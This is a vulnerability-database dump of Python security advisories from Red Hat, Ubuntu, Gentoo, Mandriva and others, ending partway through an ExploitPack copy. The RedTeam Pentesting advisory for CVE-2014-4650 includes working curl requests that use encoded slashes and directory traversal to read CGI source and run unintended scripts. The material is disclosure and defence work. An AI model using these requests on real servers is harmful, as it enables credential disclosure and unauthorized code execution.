man-in-the-middle attacker could use this flaw to hijack\nconnections and eavesdrop or modify transferred data. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to enable\ncertificate verification by default. However, for backwards compatibility,\nverification remains disabled by default. Future updates may change this\ndefault. Refer to the Knowledgebase article 2039753 linked to in the\nReferences section for further details about this change. (BZ#1219108)\n\nThis update also fixes the following bugs:\n\n* Subprocesses used with the Eventlet library or regular threads previously\ntried to close epoll file descriptors twice, which led to an \"Invalid\nargument\" error. Subprocesses have been fixed to close the file descriptors\nonly once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no longer\nproduces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the \"-s\"\noption supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts \"None\" as a keyfile argument.\n(BZ#1250611)\n\nIn addition, this update adds the following enhancements:\n\n* Security enhancements as described in PEP 466 have been backported to the\nPython standard library, for example, new features of the ssl module:\nServer Name Indication (SNI) support, support for new TLSv1.x protocols,\nnew hash algorithms in the hashlib module, and many more. (BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the ssl\nlibrary. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access information\nabout the version of the SSL protocol used in a connection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add these\nenhancements.", "modified": "2018-04-12T03:32:44", "published": "2015-11-19T18:41:01", "id": "RHSA-2015:2101", "href": "https://access.redhat.com/errata/RHSA-2015:2101", "type": "redhat", "title": "(RHSA-2015:2101) Moderate: python security, bug fix, and enhancement update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:41:09", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "description": "It was discovered that multiple Python protocol libraries incorrectly \nlimited certain data when connecting to servers. A malicious ftp, http, \nimap, nntp, pop or smtp server could use this issue to cause a denial of \nservice. (CVE-2013-1752)\n\nIt was discovered that the Python xmlrpc library did not limit unpacking \ngzip-compressed HTTP bodies. A malicious server could use this issue to \ncause a denial of service. (CVE-2013-1753)\n\nIt was discovered that the Python json module incorrectly handled a certain \nargument. An attacker could possibly use this issue to read arbitrary \nmemory and expose sensitive information. This issue only affected Ubuntu \n12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4616)\n\nIt was discovered that the Python CGIHTTPServer incorrectly handled \nURL-encoded path separators in URLs. A remote attacker could use this issue \nto expose sensitive information, or possibly execute arbitrary code. This \nissue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4650)\n\nIt was discovered that Python incorrectly handled sizes and offsets in \nbuffer functions. An attacker could possibly use this issue to read \narbitrary memory and obtain sensitive information. This issue only affected \nUbuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185)", "edition": 6, "modified": "2015-06-25T00:00:00", "published": "2015-06-25T00:00:00", "id": "USN-2653-1", "href": "https://ubuntu.com/security/notices/USN-2653-1", "title": "Python vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-02T11:45:19", "bulletinFamily": "unix", "cvelist": ["CVE-2014-1912"], "description": "Ryan Smith-Roberts discovered that Python incorrectly handled buffer sizes \nwhen using the socket.recvfrom_into() function. An attacker could possibly \nuse this issue to cause Python to crash, resulting in denial of service, or \npossibly execute arbitrary code.", "edition": 5, "modified": "2014-03-03T00:00:00", "published": "2014-03-03T00:00:00", "id": "USN-2125-1", "href": "https://ubuntu.com/security/notices/USN-2125-1", "title": "Python vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:48", "bulletinFamily": "unix", "cvelist": ["CVE-2014-1912", "CVE-2014-2667", "CVE-2013-7338", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-9365"], "edition": 1, "description": "### Background\n\nPython is an interpreted, interactive, object-oriented programming language. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Python. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA context-dependent attacker may be able to execute arbitrary code or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Python 3.3 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/python-3.3.5-r1\"\n \n\nAll Python 2.7 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/python-2.7.9-r1\"", "modified": "2015-06-17T00:00:00", "published": "2015-03-18T00:00:00", "id": "GLSA-201503-10", "href": "https://security.gentoo.org/glsa/201503-10", "type": "gentoo", "title": "Python: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-4650"], "description": "\r\n\r\nAdvisory: Python CGIHTTPServer File Disclosure and Potential Code\r\n Execution\r\n\r\nThe CGIHTTPServer Python module does not properly handle URL-encoded\r\npath separators in URLs. This may enable attackers to disclose a CGI\r\nscript&#39;s source code or execute arbitrary CGI scripts in the server&#39;s\r\ndocument root.\r\n\r\nDetails\r\n=======\r\n\r\nProduct: Python CGIHTTPServer\r\nAffected Versions:\r\n 2.7 - 2.7.7,\r\n 3.2 - 3.2.4,\r\n 3.3 - 3.3.2,\r\n 3.4 - 3.4.1,\r\n 3.5 pre-release\r\nFixed Versions:\r\n 2.7 rev b4bab0788768,\r\n 3.2 rev e47422855841,\r\n 3.3 rev 5676797f3a3e,\r\n 3.4 rev 847e288d6e93,\r\n 3.5 rev f8b3bb5eb190\r\nVulnerability Type: File Disclosure, Directory Traversal, Code Execution\r\nSecurity Risk: high\r\nVendor URL: https://docs.python.org/2/library/cgihttpserver.html\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-008\r\nAdvisory Status: published\r\nCVE: CVE-2014-4650\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650\r\n\r\n\r\nIntroduction\r\n============\r\n\r\nThe CGIHTTPServer module defines a request-handler class, interface\r\ncompatible with BaseHTTPServer. BaseHTTPRequestHandler and inherits\r\nbehavior from SimpleHTTPServer. SimpleHTTPRequestHandler but can also\r\nrun CGI scripts.\r\n\r\n&#40;from the Python documentation&#41;\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe CGIHTTPServer module can be used to set up a simple HTTP server with\r\nCGI scripts. A sample server script in Python may look like the\r\nfollowing:\r\n\r\n------------------------------------------------------------------------\r\n#!/usr/bin/env python2\r\n\r\nimport CGIHTTPServer\r\nimport BaseHTTPServer\r\n\r\nif __name__ == &quot;__main__&quot;:\r\n server = BaseHTTPServer.HTTPServer\r\n handler = CGIHTTPServer.CGIHTTPRequestHandler\r\n server_address = &#40;&quot;&quot;, 8000&#41;\r\n # Note that only /cgi-bin will work:\r\n handler.cgi_directories = [&quot;/cgi-bin&quot;, &quot;/cgi-bin/subdir&quot;]\r\n httpd = server&#40;server_address, handler&#41;\r\n httpd.serve_forever&#40;&#41;\r\n------------------------------------------------------------------------\r\n\r\nThis server should execute any scripts located in the subdirectory\r\n&quot;cgi-bin&quot;. A sample CGI script can be placed in that directory, for\r\nexample a script like the following:\r\n\r\n------------------------------------------------------------------------\r\n#!/usr/bin/env python2\r\nimport json\r\nimport sys\r\n\r\ndb_credentials = &quot;SECRET&quot;\r\nsys.stdout.write&#40;&quot;Content-type: text/json&#92;r&#92;n&#92;r&#92;n&quot;&#41;\r\nsys.stdout.write&#40;json.dumps&#40;{&quot;text&quot;: &quot;This is a Test&quot;}&#41;&#41;\r\n------------------------------------------------------------------------\r\n\r\nThe Python library CGIHTTPServer.py implements the CGIHTTPRequestHandler\r\nclass which inherits from SimpleHTTPServer.SimpleHTTPRequestHandler:\r\n\r\nclass SimpleHTTPRequestHandler&#40;BaseHTTPServer.BaseHTTPRequestHandler&#41;:\r\n[...]\r\n def do_GET&#40;self&#41;:\r\n &quot;&quot;&quot;Serve a GET request.&quot;&quot;&quot;\r\n f = self.send_head&#40;&#41;\r\n if f:\r\n try:\r\n self.copyfile&#40;f, self.wfile&#41;\r\n finally:\r\n f.close&#40;&#41;\r\n\r\n def do_HEAD&#40;self&#41;:\r\n &quot;&quot;&quot;Serve a HEAD request.&quot;&quot;&quot;\r\n f = self.send_head&#40;&#41;\r\n if f:\r\n f.close&#40;&#41;\r\n\r\n def translate_path&#40;self, path&#41;:\r\n [...]\r\n path = posixpath.normpath&#40;urllib.unquote&#40;path&#41;&#41;\r\n words = path.split&#40;&#39;/&#39;&#41;\r\n words = filter&#40;None, words&#41;\r\n path = os.getcwd&#40;&#41;\r\n [...]\r\n\r\nThe CGIHTTPRequestHandler class inherits, among others, the methods\r\ndo_GET&#40;&#41; and do_HEAD&#40;&#41; for handling HTTP GET and HTTP HEAD requests. The\r\nclass overrides send_head&#40;&#41; and implements several new methods, such as\r\ndo_POST&#40;&#41;, is_cgi&#40;&#41; and run_cgi&#40;&#41;:\r\n\r\nclass CGIHTTPRequestHandler&#40;SimpleHTTPServer.SimpleHTTPRequestHandler&#41;:\r\n[...]\r\n def do_POST&#40;self&#41;:\r\n [...]\r\n if self.is_cgi&#40;&#41;:\r\n self.run_cgi&#40;&#41;\r\n else:\r\n self.send_error&#40;501, &quot;Can only POST to CGI scripts&quot;&#41;\r\n\r\n def send_head&#40;self&#41;:\r\n &quot;&quot;&quot;Version of send_head that support CGI scripts&quot;&quot;&quot;\r\n if self.is_cgi&#40;&#41;:\r\n return self.run_cgi&#40;&#41;\r\n else:\r\n return SimpleHTTPServer.SimpleHTTPRequestHandler.send_head&#40;self&#41;\r\n\r\n def is_cgi&#40;self&#41;:\r\n [...]\r\n collapsed_path = _url_collapse_path&#40;self.path&#41;\r\n dir_sep = collapsed_path.find&#40;&#39;/&#39;, 1&#41;\r\n head, tail = collapsed_path[:dir_sep], collapsed_path[dir_sep+1:]\r\n if head in self.cgi_directories:\r\n self.cgi_info = head, tail\r\n return True\r\n return False\r\n[...]\r\n def run_cgi&#40;self&#41;:\r\n &quot;&quot;&quot;Execute a CGI script.&quot;&quot;&quot;\r\n dir, rest = self.cgi_info\r\n\r\n [...]\r\n\r\n # dissect the part after the directory name into a script name &amp;\r\n # a possible additional path, to be stored in PATH_INFO.\r\n i = rest.find&#40;&#39;/&#39;&#41;\r\n if i &gt;= 0:\r\n script, rest = rest[:i], rest[i:]\r\n else:\r\n script, rest = rest, &#39;&#39;\r\n\r\n scriptname = dir + &#39;/&#39; + script\r\n scriptfile = self.translate_path&#40;scriptname&#41;\r\n if not os.path.exists&#40;scriptfile&#41;:\r\n self.send_error&#40;404, &quot;No such CGI script &#40;&#37;r&#41;&quot; &#37; scriptname&#41;\r\n return\r\n if not os.path.isfile&#40;scriptfile&#41;:\r\n self.send_error&#40;403, &quot;CGI script is not a plain file &#40;&#37;r&#41;&quot; &#37;\r\n scriptname&#41;\r\n return\r\n [...]\r\n[...]\r\n\r\nFor HTTP GET requests, do_GET&#40;&#41; first invokes send_head&#40;&#41;. That method\r\ncalls is_cgi&#40;&#41; to determine whether the requested path is to be executed\r\nas a CGI script. The is_cgi&#40;&#41; method uses _url_collapse_path&#40;&#41; to\r\nnormalize the path, i.e. remove extraneous slashes &#40;/&#41;,current directory\r\n&#40;.&#41;, or parent directory &#40;..&#41; elements, taking care not to permit\r\ndirectory traversal below the document root. The is_cgi&#40;&#41; function\r\nreturns True when the first path element is contained in the\r\ncgi_directories list. As _url_collaps_path&#40;&#41; and is_cgi&#40;&#41; never URL\r\ndecode the path, replacing the forward slash after the CGI directory in\r\nthe URL to a CGI script with the URL encoded variant &#37;2f leads to\r\nis_cgi&#40;&#41; returning False. This will make CGIHTTPRequestHandler&#39;s\r\nsend_head&#40;&#41; then invoke its parent&#39;s send_head&#40;&#41; method which translates\r\nthe URL path to a file system path using the translate_path&#40;&#41; method and\r\nthen outputs the file&#39;s contents raw. As translate_path&#40;&#41; URL decodes\r\nthe path, this then succeeds and discloses the CGI script&#39;s file\r\ncontents:\r\n\r\n$ curl http://localhost:8000/cgi-bin&#37;2ftest.py\r\n#!/usr/bin/env python2\r\nimport json\r\nimport sys\r\n\r\ndb_credentials = &quot;SECRET&quot;\r\nsys.stdout.write&#40;&quot;Content-type: text/json&#92;r&#92;n&#92;r&#92;n&quot;&#41;\r\nsys.stdout.write&#40;json.dumps&#40;{&quot;text&quot;: &quot;This is a Test&quot;}&#41;&#41;\r\n\r\nSimilarly, the CGIHTTPRequestHandler can be tricked into executing CGI\r\nscripts that would normally not be executable. The class normally only\r\nallows executing CGI scripts that are direct children of one of the\r\ndirectories listed in cgi_directories. Furthermore, only direct\r\nsubdirectories of the document root &#40;the current working directory&#41; can\r\nbe valid CGI directories.\r\n\r\nThis can be seen in the following example. Even though the sample server\r\nshown above includes &quot;/cgi-bin/subdir&quot; as part of the request handler&#39;s\r\ncgi_directories, a CGI script named test.py in that directory is not\r\nexecuted:\r\n\r\n$ curl http://localhost:8000/cgi-bin/subdir/test.py\r\n[...]\r\n&lt;p&gt;Error code 403.\r\n&lt;p&gt;Message: CGI script is not a plain file &#40;&#39;/cgi-bin/subdir&#39;&#41;.\r\n[...]\r\n\r\nHere, is_cgi&#40;&#41; set self.cgi_info to &#40;&#39;/cgi-bin&#39;, &#39;subdir/test.py&#39;&#41; and\r\nreturned True. Next, run_cgi&#40;&#41; further dissected these paths to perform\r\nsome sanity checks, thereby mistakenly assuming subdir to be the\r\nexecutable script&#39;s filename and test.py to be path info. As subdir is\r\nnot an executable file, run_cgi&#40;&#41; returns an error message. However, if\r\nthe forward slash between subdir and test.py is replaced with &#37;2f,\r\ninvoking the script succeeds:\r\n\r\n$ curl http://localhost:8000/cgi-bin/subdir&#37;2ftest.py\r\n{&quot;text&quot;: &quot;This is a Test&quot;}\r\n\r\nThis is because neither is_cgi&#40;&#41; nor run_cgi&#40;&#41; URL decode the path\r\nduring processing until run_cgi&#40;&#41; tries to determine whether the target\r\nscript is an executable file. More specifically, as subdir&#37;2ftest.py\r\ndoes not contain a forward slash, it is not split into the script name\r\nsubdir and path info test.py, as in the previous example.\r\n\r\nSimilarly, using URL encoded forward slashes, executables outside of a\r\nCGI directory can be executed:\r\n\r\n$ curl http://localhost:8000/cgi-bin/..&#37;2ftraversed.py\r\n{&quot;text&quot;: &quot;This is a Test&quot;}\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nSubclass CGIHTTPRequestHandler and override the is_cgi&#40;&#41; method with a\r\nvariant that first URL decodes the supplied path, for example:\r\n\r\nclass FixedCGIHTTPRequestHandler&#40;CGIHTTPServer.CGIHTTPRequestHandler&#41;:\r\n def is_cgi&#40;self&#41;:\r\n self.path = urllib.unquote&#40;self.path&#41;\r\n return CGIHTTPServer.CGIHTTPRequestHandler.is_cgi&#40;self&#41;\r\n\r\n\r\nFix\r\n===\r\n\r\nUpdate to the latest Python version from the Mercurial repository at\r\nhttp://hg.python.org/cpython/\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThe vulnerability can be used to gain access to the contents of CGI\r\nbinaries or the source code of CGI scripts. This may reveal sensitve\r\ninformation, for example access credentials. This can greatly help\r\nattackers in mounting further attacks and is therefore considered to\r\npose a high risk. Furthermore attackers may be able to execute code that\r\nwas not intended to be executed. However, this is limited to files\r\nstored in the server&#39;s working directory or in its subdirectories.\r\n\r\nThe CGIHTTPServer code does contain this warning:\r\n&quot;SECURITY WARNING: DON&#39;T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL&quot;\r\nEven when used on a local computer this may allow other local users to\r\nexecute code in the context of another user.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2014-04-07 Vulnerability identified\r\n2014-06-11 Customer approved disclosure to vendor\r\n2014-06-11 Vendor notified\r\n2014-06-15 Vendor disclosed vulnerability in their public bug tracker\r\n and addressed it in public source code repository\r\n2014-06-23 CVE number requested\r\n2014-06-25 CVE number assigned\r\n2014-06-26 Advisory released\r\n\r\n\r\nReferences\r\n==========\r\n\r\nhttp://bugs.python.org/issue21766\r\n\r\n\r\nRedTeam Pentesting GmbH\r\n=======================\r\n\r\nRedTeam Pentesting offers individual penetration tests, short pentests,\r\nperformed by a team of specialised IT-security experts. Hereby, security\r\nweaknesses in company networks or products are uncovered and can be\r\nfixed immediately.\r\n\r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity related areas. The results are made available as public\r\nsecurity advisories.\r\n\r\nMore information about RedTeam Pentesting can be found at\r\nhttps://www.redteam-pentesting.de.\r\n\r\n\r\n-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschaftsfuhrer: Patrick Hof, Jens Liebchen\r\n\r\n", "edition": 1, "modified": "2014-10-15T00:00:00", "published": "2014-10-15T00:00:00", "id": "SECURITYVULNS:DOC:31253", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31253", "title": "[RT-SA-2014-008] Python CGIHTTPServer File Disclosure and Potential Code Execution", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-1912"], "description": "socket.recvfrom_info&#40;&#41; buffer overflow", "edition": 1, "modified": "2014-03-03T00:00:00", "published": "2014-03-03T00:00:00", "id": "SECURITYVULNS:VULN:13594", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13594", "title": "Python buffer overflow", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:50", "bulletinFamily": "software", "cvelist": ["CVE-2014-1912"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:041\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : python\r\n Date : February 19, 2014\r\n Affected: Business Server 1.0, Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n A vulnerability was reported in Python&#039;s socket module, due to a\r\n boundary error within the sock_recvfrom_into&#40;&#41; function, which could\r\n be exploited to cause a buffer overflow. This could be used to crash a\r\n Python application that uses the socket.recvfrom_info&#40;&#41; function or,\r\n possibly, execute arbitrary code with the permissions of the user\r\n running vulnerable Python code &#40;CVE-2014-1912&#41;.\r\n \r\n The updated packages have been patched to correct this issue.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1912\r\n http://bugs.python.org/issue20246\r\n https://bugzilla.redhat.com/show_bug.cgi?id=1062370\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Enterprise Server 5:\r\n 9f5d8acdfaff42d2fe7aae145aa6bdf4 mes5/i586/libpython2.5-2.5.2-5.13mdvmes5.2.i586.rpm\r\n 87e946a35ed4a041ce15fb328a94962f mes5/i586/libpython2.5-devel-2.5.2-5.13mdvmes5.2.i586.rpm\r\n 8e89735ab8baa2f6975f8238b082c059 mes5/i586/python-2.5.2-5.13mdvmes5.2.i586.rpm\r\n 903a0bd59758cf89d2cfc6f50dfccf31 mes5/i586/python-base-2.5.2-5.13mdvmes5.2.i586.rpm\r\n 12299e01e8a6854b9b737e7134e0c67e mes5/i586/python-docs-2.5.2-5.13mdvmes5.2.i586.rpm\r\n 6981e8ff73aea76e7781c9f4eaa16221 mes5/i586/tkinter-2.5.2-5.13mdvmes5.2.i586.rpm\r\n b48267baca317515f87ba162ed4eab02 mes5/i586/tkinter-apps-2.5.2-5.13mdvmes5.2.i586.rpm \r\n 83a624a38fbf33f8dd30be16c059fedd mes5/SRPMS/python-2.5.2-5.13mdvmes5.2.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n d29187d3073068ca4dd23a7e873ad23f mes5/x86_64/lib64python2.5-2.5.2-5.13mdvmes5.2.x86_64.rpm\r\n 6a982f71c8363e6bce7f8958168702bd mes5/x86_64/lib64python2.5-devel-2.5.2-5.13mdvmes5.2.x86_64.rpm\r\n 75bc4436ed423dcedaf209d774bcbfab mes5/x86_64/python-2.5.2-5.13mdvmes5.2.x86_64.rpm\r\n 33a74fac35c5009fcc066d774f4b200d mes5/x86_64/python-base-2.5.2-5.13mdvmes5.2.x86_64.rpm\r\n 945d27beff9becc2b207027edd6b90e1 mes5/x86_64/python-docs-2.5.2-5.13mdvmes5.2.x86_64.rpm\r\n 9163259f05462f665998c2add88f8631 mes5/x86_64/tkinter-2.5.2-5.13mdvmes5.2.x86_64.rpm\r\n 63d61503b92a17c04548db2b60faa395 mes5/x86_64/tkinter-apps-2.5.2-5.13mdvmes5.2.x86_64.rpm \r\n 83a624a38fbf33f8dd30be16c059fedd mes5/SRPMS/python-2.5.2-5.13mdvmes5.2.src.rpm\r\n\r\n Mandriva Business Server 1/X86_64:\r\n 949fbdcadfe90fd12d6c6dcc2d1740ef mbs1/x86_64/lib64python2.7-2.7.3-4.5.mbs1.x86_64.rpm\r\n 750b20f80e21a7b2a753b736fb3bbb9b mbs1/x86_64/lib64python-devel-2.7.3-4.5.mbs1.x86_64.rpm\r\n 9264c30b67dd6fa5438b73ecc9e218aa mbs1/x86_64/python-2.7.3-4.5.mbs1.x86_64.rpm\r\n e3245ecc8907e9ae9e8dc70e23d057c6 mbs1/x86_64/python-docs-2.7.3-4.5.mbs1.noarch.rpm\r\n b2fa904583d40bca084cc24c1599cc47 mbs1/x86_64/tkinter-2.7.3-4.5.mbs1.x86_64.rpm\r\n f115c68c0713f3681d411d635c910374 mbs1/x86_64/tkinter-apps-2.7.3-4.5.mbs1.x86_64.rpm \r\n ad12c7fe3e8f82dd0e4836288af1198a mbs1/SRPMS/python-2.7.3-4.5.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFTBF1JmqjQ0CJFipgRAhDEAJ9tmnwSQ16RCBiNjXc7qge0Q/oXnQCgmsKL\r\n7otvc41VTF+HbIhMxfFud6Y=\r\n=PIy4\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2014-03-03T00:00:00", "published": "2014-03-03T00:00:00", "id": "SECURITYVULNS:DOC:30347", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30347", "title": "[ MDVSA-2014:041 ] python", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:44", "description": "\nPython CGIHTTPServer - Encoded Directory Traversal", "edition": 1, "published": "2014-06-27T00:00:00", "title": "Python CGIHTTPServer - Encoded Directory Traversal", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4650"], "modified": "2014-06-27T00:00:00", "id": "EXPLOITPACK:35A921A81EE6FB28E829D4305BB3A08D", "href": "", "sourceData": "Advisory: Python CGIHTTPServer File Disclosure and Potential Code\n Execution\n\nThe CGIHTTPServer Python module does not properly handle URL-encoded\npath separators in URLs. This may enable attackers to disclose a CGI\nscript's source code or execute arbitrary CGI scripts in the server's\ndocument root.\n\nDetails\n=======\n\nProduct: Python CGIHTTPServer\nAffected Versions:\n 2.7 - 2.7.7,\n 3.2 - 3.2.4,\n 3.3 - 3.3.2,\n 3.4 - 3.4.1,\n 3.5 pre-release\nFixed Versions:\n 2.7 rev b4bab0788768,\n 3.2 rev e47422855841,\n 3.3 rev 5676797f3a3e,\n 3.4 rev 847e288d6e93,\n 3.5 rev f8b3bb5eb190\nVulnerability Type: File Disclosure, Directory Traversal, Code Execution\nSecurity Risk: high\nVendor URL: https://docs.python.org/2/library/cgihttpserver.html\nVendor Status: fixed version released\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-008\nAdvisory Status: published\nCVE: CVE-2014-4650\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650\n\n\nIntroduction\n============\n\nThe CGIHTTPServer module defines a request-handler class, interface\ncompatible with BaseHTTPServer. BaseHTTPRequestHandler and inherits\nbehavior from SimpleHTTPServer. SimpleHTTPRequestHandler but can also\nrun CGI scripts.\n\n(from the Python documentation)\n\n\nMore Details\n============\n\nThe CGIHTTPServer module can be used to set up a simple HTTP server with\nCGI scripts. A sample server script in Python may look like the\nfollowing:\n\n------------------------------------------------------------------------\n#!/usr/bin/env python2\n\nimport CGIHTTPServer\nimport BaseHTTPServer\n\nif __name__ == \"__main__\":\n server = BaseHTTPServer.HTTPServer\n handler = CGIHTTPServer.CGIHTTPRequestHandler\n server_address = (\"\", 8000)\n # Note that only /cgi-bin will work:\n handler.cgi_directories = [\"/cgi-bin\", \"/cgi-bin/subdir\"]\n httpd = server(server_address, handler)\n httpd.serve_forever()\n------------------------------------------------------------------------\n\nThis server should execute any scripts located in the subdirectory\n\"cgi-bin\". A sample CGI script can be placed in that directory, for\nexample a script like the following:\n\n------------------------------------------------------------------------\n#!/usr/bin/env python2\nimport json\nimport sys\n\ndb_credentials = \"SECRET\"\nsys.stdout.write(\"Content-type: text/json\\r\\n\\r\\n\")\nsys.stdout.write(json.dumps({\"text\": \"This is a Test\"}))\n------------------------------------------------------------------------\n\nThe Python library CGIHTTPServer.py implements the CGIHTTPRequestHandler\nclass which inherits from SimpleHTTPServer.SimpleHTTPRequestHandler:\n\nclass SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):\n[...]\n def do_GET(self):\n \"\"\"Serve a GET request.\"\"\"\n f = self.send_head()\n if f:\n try:\n self.copyfile(f, self.wfile)\n finally:\n f.close()\n\n def do_HEAD(self):\n \"\"\"Serve a HEAD request.\"\"\"\n f = self.send_head()\n if f:\n f.close()\n\n def translate_path(self, path):\n [...]\n path = posixpath.normpath(urllib.unquote(path))\n words = path.split('/')\n words = filter(None, words)\n path = os.getcwd()\n [...]\n\nThe CGIHTTPRequestHandler class inherits, among others, the methods\ndo_GET() and do_HEAD() for handling HTTP GET and HTTP HEAD requests. The\nclass overrides send_head() and implements several new methods, such as\ndo_POST(), is_cgi() and run_cgi():\n\nclass CGIHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\n[...]\n def do_POST(self):\n [...]\n if self.is_cgi():\n self.run_cgi()\n else:\n self.send_error(501, \"Can only POST to CGI scripts\")\n\n def send_head(self):\n \"\"\"Version of send_head that support CGI scripts\"\"\"\n if self.is_cgi():\n return self.run_cgi()\n else:\n return SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self)\n\n def is_cgi(self):\n [...]\n collapsed_path = _url_collapse_path(self.path)\n dir_sep = collapsed_path.find('/', 1)\n head, tail = collapsed_path[:dir_sep], collapsed_path[dir_sep+1:]\n if head in self.cgi_directories:\n self.cgi_info = head, tail\n return True\n return False\n[...]\n def run_cgi(self):\n \"\"\"Execute a CGI script.\"\"\"\n dir, rest = self.cgi_info\n\n [...]\n\n # dissect the part after the directory name into a script name &\n # a possible additional path, to be stored in PATH_INFO.\n i = rest.find('/')\n if i >= 0:\n script, rest = rest[:i], rest[i:]\n else:\n script, rest = rest, ''\n\n scriptname = dir + '/' + script\n scriptfile = self.translate_path(scriptname)\n if not os.path.exists(scriptfile):\n self.send_error(404, \"No such CGI script (%r)\" % scriptname)\n return\n if not os.path.isfile(scriptfile):\n self.send_error(403, \"CGI script is not a plain file (%r)\" %\n scriptname)\n return\n [...]\n[...]\n\nFor HTTP GET requests, do_GET() first invokes send_head(). That method\ncalls is_cgi() to determine whether the requested path is to be executed\nas a CGI script. The is_cgi() method uses _url_collapse_path() to\nnormalize the path, i.e. remove extraneous slashes (/),current directory\n(.), or parent directory (..) elements, taking care not to permit\ndirectory traversal below the document root. The is_cgi() function\nreturns True when the first path element is contained in the\ncgi_directories list. As _url_collaps_path() and is_cgi() never URL\ndecode the path, replacing the forward slash after the CGI directory in\nthe URL to a CGI script with the URL encoded variant %2f leads to\nis_cgi() returning False. This will make CGIHTTPRequestHandler's\nsend_head() then invoke its parent's send_head() method which translates\nthe URL path to a file system path using the translate_path() method and\nthen outputs the file's 